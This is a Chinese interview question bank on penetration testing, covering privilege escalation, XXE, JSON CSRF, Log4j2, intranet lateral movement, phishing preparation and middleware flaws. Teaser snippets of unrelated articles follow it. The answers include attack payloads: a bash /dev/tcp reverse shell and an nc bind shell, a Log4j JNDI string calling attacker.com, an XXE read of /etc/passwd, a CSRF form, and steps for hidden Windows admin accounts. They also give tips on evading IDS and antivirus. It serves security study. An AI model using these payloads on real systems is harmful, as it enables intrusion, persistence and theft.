2025年渗透测试面试题总结-拷打题库03(题目+回答)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

2025年渗透测试面试题总结-拷打题库03

一、Windows与Linux系统提权思路

Windows提权

Linux提权

二、Python框架及漏洞

主流框架与漏洞

三、小程序与普通渗透的差异

四、App漏洞测试要点

五、IDS/IPS防护与绕过

防护原理

绕过思路

六、JSON相关漏洞

JSON CSRF利用

JSON数据包测试点

七、XXE漏洞原理与利用

原理

利用方式

八、内网信息收集

九、内网横向探测方法

十、外网打点流程

十一、FOFA使用技巧

十二、CDN识别方法

十三、邮件钓鱼准备

十四、CMS识别的意义

十五、Apache Log4j2漏洞原理

十六、水坑攻击与鱼叉攻击对比

十七、判断操作系统类型

十八、3389端口无法连接的原因

十九、建立隐藏用户(Windows)

二十、MySQL无法连接的原因

二十一、文件上传监测点

二十二、常见未授权访问漏洞

二十三、危险函数列表

二十四、正反向Shell对比

二十六、Web TOP 10漏洞(OWASP 2023)

二十七、SQL注入类型

二十八、中间件及漏洞

二十九、目录扫描工具

2025年渗透测试面试题总结-拷打题库03

谈一谈Windows系统与Linux系统提权的思路?
python有哪些框架,其中出现过哪些漏洞
小程序的渗透和普通渗透的差异
app本身的漏洞测试
IDS/IPS防护原理及绕过思路
json的csrf的利用
json格式的数据包可以测哪些漏洞
简述xxe漏洞原理与利用方式
内网服务器,如何进行信息收集?
如果拿下了内网边界层的某一个机器,如何对内网其他进行探测?
描述外网打点的流程?
举几个 FOFA 在外网打点过程中的使用小技巧?
如何识别CDN?
邮件钓鱼的准备工作有哪些?
判断出靶标的 CMS,对外网打点有什么意义?
Apache Log4j2 的漏洞原理是什么?
水坑攻击和鱼叉攻击的区别是什么?
如何判断靶标站点是 windows/linux?
无法连接服务器 3389 端口的几种情况?
如何建立隐藏用户?
为什么 Mysql 数据库的站点,无法连接?
文件上传功能的监测点有哪些?
常见的未授权访问漏洞有哪些?
代码执行、文件读取、命令执行的函数有哪些?
正向 shell 和反向 shell 的区别是什么?
正向代理和反向代理的区别?
Web TOP 10 漏洞有哪些?
SQL 注入的种类有哪些?
常见的中间件有哪些?他们有那些漏洞?
常见的目录扫描工具有哪些?

一、Windows与Linux系统提权思路

Windows提权
  1. 漏洞利用
    • 利用未修补的系统漏洞(如MS17-010永恒之蓝、CVE-2020-0796 SMBGhost)。
    • 通过提权工具(如JuicyPotato、PrintSpoofer)滥用服务权限。
  2. 服务配置错误
    • 查找弱权限服务(sc query查看服务权限),通过修改可执行路径或参数注入恶意代码。
    • 利用AlwaysInstallElevated策略安装恶意MSI包。
  3. 令牌窃取
    • 使用Mimikatz抓取内存中的管理员令牌或凭证(如Pass-the-Hash)。
  4. 计划任务/启动项
    • 劫持高权限计划任务或注册表启动项(如schtasks)。
Linux提权
  1. 内核漏洞
    • 利用CVE-2016-5195(DirtyCow)、CVE-2021-4034(PwnKit)等漏洞直接获取root权限。
  2. SUID/SGID滥用
    • 查找具有SUID权限的可执行文件(find / -perm -4000),利用配置不当程序(如findvim)执行命令。
  3. 环境变量劫持
    • 通过LD_PRELOAD注入恶意动态库,或劫持PATH路径中的程序。
  4. 定时任务(Cron)
    • 检查全局可写的Cron脚本或路径劫持(如利用通配符*的tar命令)。

二、Python框架及漏洞

主流框架与漏洞
  1. Django
    • CVE-2021-35042(URL路径遍历)、CVE-2019-14234(SQL注入)。
  2. Flask
    • 服务器端模板注入(SSTI)漏洞(如{{ config.items() }}泄露敏感信息)。
  3. FastAPI
    • 依赖库漏洞(如ujson反序列化问题)。
  4. Pickle反序列化
    • 使用pickle.loads 处理用户输入导致远程代码执行(RCE)。

三、小程序与普通渗透的差异

对比项小程序渗透普通Web渗透
入口点微信/支付宝客户端、云函数接口传统Web页面、API接口
安全机制HTTPS强制、Token鉴权、数据加密依赖Cookie/Session、CORS策略
测试重点云函数未授权、本地存储泄露、接口越权SQL注入、XSS、CSRF、文件上传漏洞
逆向难度需反编译小程序包(如wxapkg)直接分析前端代码

四、App漏洞测试要点

  1. 本地存储安全
    • 检查SharedPreferences、SQLite数据库明文存储敏感数据。
  2. 组件暴露
    • Android的Activity/Service导出导致未授权访问(如adb shell am start)。
  3. SSL Pinning绕过
    • 使用Frida或Xposed框架Hook证书验证逻辑。
  4. API接口安全
    • 参数篡改(如修改用户ID越权)、重放攻击测试。

五、IDS/IPS防护与绕过

防护原理
  • 签名检测:匹配已知攻击特征(如SQL关键字UNION SELECT)。
  • 行为分析:检测异常流量(如高频登录尝试)。
绕过思路
  1. 混淆技术
    • 对Payload进行编码(如Hex/Unicode/Base64)、分片传输。
  2. 协议滥用
    • 利用HTTP/2多路复用、分块传输编码(Chunked)绕过内容检测。
  3. 慢速攻击
    • 降低请求速率(如每秒1次)绕过阈值触发。

六、JSON相关漏洞

JSON CSRF利用
  • 条件:服务端未校验Content-Type或依赖Cookie鉴权。
  • 构造Payload
    html<form action="http://target.com/api" method="POST" enctype="text/plain"> <input name='{"user":"attacker","csrf":"' value='test"}' type="hidden"> </form>
JSON数据包测试点
  1. XXE注入
    • 修改Content-Typeapplication/xml,插入恶意实体。
  2. JSONP劫持
    • 未校验回调函数名(如callback=alert(1)//)。

七、XXE漏洞原理与利用

原理
  • XML解析器未禁用外部实体引用,导致文件读取或SSRF。
利用方式
xml<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data> 
  • 防御:禁用DTD、使用JSON替代XML。

八、内网信息收集

  1. 网络拓扑探测
    • 使用arp-scannbtscan发现存活主机。
  2. 服务枚举
    • Nmap扫描端口(SMB 445、WinRM 5985、SSH 22)。
  3. 凭证获取
    • 提取内存密码(Mimikatz)、历史命令记录(.bash_history)。

九、内网横向探测方法

  1. 代理搭建
    • 使用EarthWorm/reGeorg建立Socks代理穿透内网。
  2. 横向移动
    • Pass-the-Ticket攻击Kerberos服务、WMI远程执行命令。
  3. 权限维持
    • 创建隐藏计划任务、SSH公钥植入。

十、外网打点流程

  1. 资产发现
    • 使用FOFA搜索title="后台管理"header="thinkphp"
  2. 漏洞验证
    • 优先测试历史漏洞(如Log4j2、Shiro反序列化)。
  3. 权限获取
    • 上传Webshell、利用RCE漏洞反弹Shell。

十一、FOFA使用技巧

  1. 精准搜索
    • title="登录" && country="CN":定位中文登录页面。
    • icon_hash="-123456":通过网站图标识别特定资产。
  2. 关联分析
    • cert="*.example.com" :查找同一证书的关联域名。

十二、CDN识别方法

  1. 多地Ping
    • 使用ping或在线工具(如ipip.net )检测IP是否多地一致。
  2. DNS历史记录
    • 通过SecurityTrails查看历史解析记录。
  3. 子域名探测
    • 主站使用CDN,但未备案的子域名可能直连真实IP。

十三、邮件钓鱼准备

  1. 目标画像
    • 收集目标邮箱、职位、社交动态(如LinkedIn)。
  2. 邮件伪造
    • 使用Swaks工具伪造发件人(如CEO@company.com )。
  3. Payload设计
    • 制作免杀宏文档(VBA代码混淆)、钓鱼链接短链跳转。

十四、CMS识别的意义

  • 快速定位漏洞
    • 已知CMS(如WordPress、ThinkPHP)的公开漏洞可直接利用(如ThinkPHP 5.0 RCE)。
  • 缩小攻击面
    • 针对性扫描默认路径(如/wp-admin)、插件目录。

十五、Apache Log4j2漏洞原理

  • 漏洞核心:JNDI注入,攻击者通过${jndi:ldap://attacker.com/exp} 触发远程类加载。
  • 影响范围:所有使用Log4j2 2.0-beta9至2.14.1版本的应用。

十六、水坑攻击与鱼叉攻击对比

对比项水坑攻击鱼叉攻击
目标特定群体(如企业员工)特定个人(如高管)
手段劫持目标常访问的网站挂马定向发送钓鱼邮件/文件
技术难度需入侵高流量网站依赖社会工程学精准伪装

十七、判断操作系统类型

  1. HTTP头特征
    • Windows服务器可能返回Server: Microsoft-IIS/10.0
  2. 文件路径差异
    • URL中出现\(如/images\test.jpg )多为Windows。
  3. 报错信息
    • Linux错误提示包含/var/log/路径。

十八、3389端口无法连接的原因

  1. 网络层问题
    • 防火墙拦截(入站规则未放行3389)。
  2. 服务配置
    • 远程桌面服务未启动(services.msc 检查TermService)。
  3. 认证限制
    • 仅允许特定用户组连接(如Administrators)。

十九、建立隐藏用户(Windows)

  1. 注册表操作
    • 创建用户后修改注册表HKLM\SAM\Domains\Account\Users,将用户键值设为与管理员相同的F值。
  2. 命令行隐藏
    • 使用net user test$ /add创建带$的用户(部分工具不显示)。

二十、MySQL无法连接的原因

  1. 权限限制
    • 用户仅允许localhost访问(检查mysql.user 表)。
  2. 网络配置
    • MySQL绑定IP为127.0.0.1,拒绝外部连接。
  3. 防火墙拦截
    • 云服务器安全组未放行3306端口。

二十一、文件上传监测点

  1. 类型校验
    • 绕过黑名单(如上传.php5.phtml)。
  2. 内容检测
    • 插入图片马绕过文件头检测(GIF89a)。
  3. 路径控制
    • 利用目录穿越(如filename="../../test.php" )。

二十二、常见未授权访问漏洞

  1. Redis
    • 未设密码,可直接写入SSH公钥或Webshell。
  2. MongoDB
    • 默认无需认证,导致数据泄露。
  3. Kubernetes API
    • 匿名访问开启,可创建恶意容器。

二十三、危险函数列表

漏洞类型函数示例
代码执行eval()exec()popen()
文件读取file_get_contents()fopen()
命令执行system()shell_exec()

二十四、正反向Shell对比

对比项正向Shell反向Shell
连接方向攻击者主动连接目标目标主动连接攻击者
适用场景目标出站受限(如防火墙严格)绕过目标入站限制
典型命令nc -lvp 4444 -e /bin/shbash -i >& /dev/tcp/1.1.1.1/4444 0>&1

 

二十六、Web TOP 10漏洞(OWASP 2023)

  1. 失效的访问控制(Broken Access Control)
  2. 加密机制缺失(Cryptographic Failures)
  3. 注入漏洞(Injection)
  4. 不安全设计(Insecure Design)
  5. 安全配置错误(Security Misconfiguration)

二十七、SQL注入类型

  1. 联合查询注入UNION SELECT拼接数据。
  2. 盲注(Boolean/Time):通过条件判断或延时差异提取数据。
  3. 报错注入:利用数据库报错回显信息(如updatexml())。

二十八、中间件及漏洞

  1. Apache
    • 解析漏洞(.php.xxx )、CVE-2021-41773(路径遍历)。
  2. Nginx
    • 目录穿越(CVE-2017-7529)、配置错误导致目录列表。
  3. Tomcat
    • 弱口令爆破后台、CVE-2020-1938(Ghostcat文件读取)。

二十九、目录扫描工具

  1. DirBuster:支持多线程、自定义字典。
  2. 御剑:快速扫描常见后台路径(如/admin)。
  3. gobuster:基于Go语言,支持多种模式(dir、dns、vhost)。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/77719.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【华为】OSPF震荡引起CPU占用率高怎么解决?

原创&#xff1a;厦门微思网络 现象描述 如图所示&#xff0c;Switch_1、Switch_2、Switch_3和Switch_4配置了OSPF协议&#xff0c;发现Switch_1设备的CPU占用率高&#xff0c;ROUT任务占用率明显高于其他任务并且产生路由震荡。 故障组网图 原因分析 网络中IP地址冲突导致…

Everything 安装教程与使用教程(附安装包)

文章目录 前言一、Everything 介绍二、Everything 安装教程1.Everything 安装包下载2.选择安装文件3.选择安装语言4.接受许可协议5.选择安装位置6.配置安装选项7.完成安装 三、Everything 使用教程1.启动软件2.简单关键词搜索3.按类型搜索 前言 在日常使用电脑时&#xff0c;随…

极狐GitLab CI/CD 流水线计算分钟数如何管理?

极狐GitLab 是 GitLab 在中国的发行版&#xff0c;关于中文参考文档和资料有&#xff1a; 极狐GitLab 中文文档极狐GitLab 中文论坛极狐GitLab 官网 计算分钟管理 (PREMIUM SELF) 在极狐GitLab 16.1 中&#xff0c;从 CI/CD 分钟数重命名为计算配额或计算分钟数。 管理员可…

Containerd 1.7.2 离线安装与配置全指南(生产级优化)

Containerd 1.7.2 离线安装与配置全指南&#xff08;生产级优化&#xff09; 摘要&#xff1a;本文详细讲解在无外网环境下部署 Containerd 1.7.2 容器运行时的完整流程&#xff0c;涵盖二进制包安装、私有镜像仓库配置、Systemd服务集成等关键步骤&#xff0c;并提供生产环境…

33-公交车司机管理系统

技术&#xff1a; 基于 B/S 架构 SpringBootMySQLvueelementui 环境&#xff1a; Idea mysql maven jdk1.8 node 用户端功能 1.首页:展示车辆信息及车辆位置和线路信息 2.模块:车辆信息及车辆位置和线路信息 3.公告、论坛 4.在线留言 5.个人中心:修改个人信息 司机端功能…

基于 OpenCV 的图像与视频处理

基于 OpenCV 的图像处理 一、实验背景 OpenCV 是一个开源的计算机视觉库&#xff0c;广泛应用于图像处理、视频分析、目标检测等领域。通过学习 OpenCV&#xff0c;可以快速实现图像和视频的处理功能&#xff0c;为复杂的应用开发 奠定基础。本实验旨在通过实际代码示例&…

Linux 常用指令用户手册

Linux 常用指令用户手册 适合新手入门 & 日常速查 目录 基础操作文件与目录管理权限与所有权文本处理压缩与解压系统监控网络操作进程管理实用小技巧 1. 基础操作 1.1 查看系统信息 # 查看内核版本 uname -a# 查看系统发行版信息&#xff08;适用于 Debian/Ubuntu&…

长效IP与短效IP:如何选择适合业务的代理类型

在当今数据驱动的互联网环境中&#xff0c;代理IP已成为企业运营、数据采集和网络安全的关键工具。其中长效IP与短效IP作为两种主流代理类型&#xff0c;因特性差异被应用于不同场景。本文将深入解析二者的区别&#xff0c;并提供实际场景中的选择建议。 一、长效IP与短效IP&a…

数据结构|排序算法(三)选择排序 堆排序 归并排序

一、选择排序 1.算法思想 选择排序&#xff08;Selection Sort&#xff09;是一种简单直观的排序算法&#xff0c;其基本思想是&#xff1a;每次都从待排序部分中选出最小的一个数据和待排序的第一个数据交换。 将待排序序列分为已排序和未排序两部分&#xff0c;初始时已排…

Vue3 + TypeScript,关于item[key]的报错处理方法

处理方法1&#xff1a;// ts-ignore 注释忽略报错 处理方法2&#xff1a;item 设置为 any 类型

8.观察者模式:思考与解读

原文地址:观察者模式&#xff1a;思考与解读 更多内容请关注&#xff1a;7.深入思考与解读设计模式 引言 在开发软件时&#xff0c;系统的某些状态可能会发生变化&#xff0c;而你希望这些变化能够自动通知到依赖它们的其他模块。你是否曾经遇到过&#xff0c;系统中某个对象…

【HD-RK3576-PI】Ubuntu桌面多显、旋转以及更新Logo

硬件&#xff1a;HD-RK3576-PI 软件&#xff1a;Linux6.1Ubuntu22.04 在基于HD-RK3576-PI硬件平台运行Ubuntu 22系统的开发过程中&#xff0c;屏幕方向调整是提升人机交互体验的关键环节。然而&#xff0c;由于涉及uboot引导阶段、内核启动界面、桌面环境显示全流程适配&#x…

Rsync+sersync2实现目录实时同步

Sersync rsync 实现实时同步服务 sersync2二进制包目录规划 /app/tools/sersync/ /app/tools/sersync/bin /app/tools/sersync/conf项目架构是这样的&#xff1a; ------------------- ------------------- ------------------- | | …

MySQL视图高级应用与最佳实践

1. 视图与索引的协同优化​​ ​​物化视图&#xff08;模拟实现&#xff09;​​ MySQL原生不支持物化视图&#xff0c;但可通过“定时刷新”的物理表模拟&#xff1a; -- 1. 创建存储结果的物理表 CREATE TABLE cached_monthly_sales (product_id INT,total_sales DECIMAL(10…

string的模拟实现 (6)

目录 1.string.h 2.string.cpp 3.test.cpp 4.一些注意点 本篇博客就学习下如何模拟实现简易版的string类&#xff0c;学好string类后面学习其他容器也会更轻松些。 代码实现如下&#xff1a; 1.string.h #define _CRT_SECURE_NO_WARNINGS 1 #pragma once #include <…

Unity:像素(Pixels) 和 单位(Units)

目录 从第一性原理出发&#xff1a;什么是像素和 Unit&#xff1f; &#x1f9f1; 1. 像素&#xff08;Pixel&#xff09;&#xff1a;图像的最小单位 &#x1f4d0; 2. Unity Unit&#xff08;单位&#xff09;&#xff1a;游戏世界中的度量单位 核心换算公式&#xff1a;…

【失败总结】Win10系统安装docker

1.启用或关闭windows功能中&#xff0c;将Hyper-V功能勾选全部启用&#xff0c;容器勾选。设置好后要重启电脑。 2.管网下载下载安装Docker  Docker官网&#xff1a;https://www.docker.com/ 3.可以自定义Docker安装路径 新建安装目录&#xff1a;d:\MySoftware\Docker并将D…

《Adaptive Layer-skipping in Pre-trained LLMs》- 论文笔记

作者&#xff1a;Xuan Luo, Weizhi Wang, Xifeng Yan Department of Computer Science, UC Santa Barbara xuan_luoucsb.edu, weizhiwangucsb.edu, xyancs.ucsb.edu 1. 引言与动机 1.1 背景 LLM 的成功与挑战: 大型语言模型 (LLMs) 在翻译、代码生成、推理等任务上取得巨大成…

DQN在Gym的MountainCar环境的实现

DQN on MountainCar 引言 在本次实验里&#xff0c;我构建了DQN和Dueling DQN&#xff0c;并在Gymnasium库的MountainCar环境中对它们展开测试。我通过调整训练任务的超参数&#xff0c;同时设计不同的奖励函数及其对应参数&#xff0c;致力于获取更优的训练效果。最后&#…

计算机网络综合实验指南

计算机网络综合实验指南 本实验将结合《计算机网络自顶向下》前三章的核心概念&#xff0c;通过实际操作加深对应用层、运输层和网络层的理解。实验涵盖 HTTP/TCP抓包分析、DNS解析观察、网页性能评估及简单Socket编程&#xff0c;帮助你将理论转化为实践。 实验准备 工具&…